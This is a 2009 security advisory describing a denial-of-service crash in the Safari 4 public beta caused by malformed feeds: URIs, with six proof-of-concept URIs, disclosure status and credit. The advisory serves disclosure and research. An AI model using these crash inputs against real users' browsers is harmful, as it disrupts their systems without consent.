Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of
Service Vulnerability
Date: Feb 25 2009
Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
* Apple Safari 4 (528.16) Public Beta
Note: MacOS X versions not tested.
Description:
Apple Safari is prone to a denial-of-service vulnerability, caused by a
NULL pointer defernce bug, because it fails to adequately sanitize
user-supplied input within afeeds: URI.
Attackers can exploit this issue to cause denial-of-service conditions
on a users computer and crash the Safari process.
Proof-of-Concept:
feeds:%&www.rec-sec.com/feed/
feeds:{&www.rec-sec.com/feed/
feeds:}&www.rec-sec.com/feed/
feeds:^&www.rec-sec.com/feed/
feeds:`&www.rec-sec.com/feed/
feeds:|&www.rec-sec.com/feed/
Any feeds: URI containing one of these characters will cause a
denial-of-service condition.
Disclosure:
Vendor has been informed.
Solution:
No solution.
Credit:
Trancer
http://www.rec-sec.com
Trancer0nly Human
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum